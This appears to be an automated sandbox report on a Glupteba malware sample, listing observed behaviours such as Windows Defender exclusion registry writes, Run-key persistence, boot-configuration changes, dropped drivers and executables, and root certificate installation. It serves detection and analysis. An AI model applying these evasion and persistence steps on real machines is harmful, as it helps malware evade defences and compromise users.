Analysis Overview
SHA256
046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27
Threat Level: Known bad
The file 046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Glupteba payload
Glupteba
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Drops file in Drivers directory
Executes dropped EXE
UPX packed file
Windows security modification
Loads dropped DLL
Checks installed software on the system
Manipulates WinMonFS driver.
Adds Run key to start application
Manipulates WinMon driver.
Drops file in System32 directory
Drops file in Windows directory
Checks for VirtualBox DLLs, possible anti-VM trick
Launches sc.exe
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
GoLang User-Agent
Uses Task Scheduler COM API
Modifies system certificate store
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-09 22:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-09 22:32
Reported: 2024-05-09 22:37
Platform: win7-20240221-en
Max time kernel: 293s
Max time network: 298s
Command Line
Signatures
Glupteba
Glupteba payload
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
UPX packed file
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe = "0" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240509223218.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-21 = "Cape Verde Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\046bbc5bd1fa1d372ab1ef4026952faa685ce106f833284836d21813a9f22b27.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = (certificate blob omitted) | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
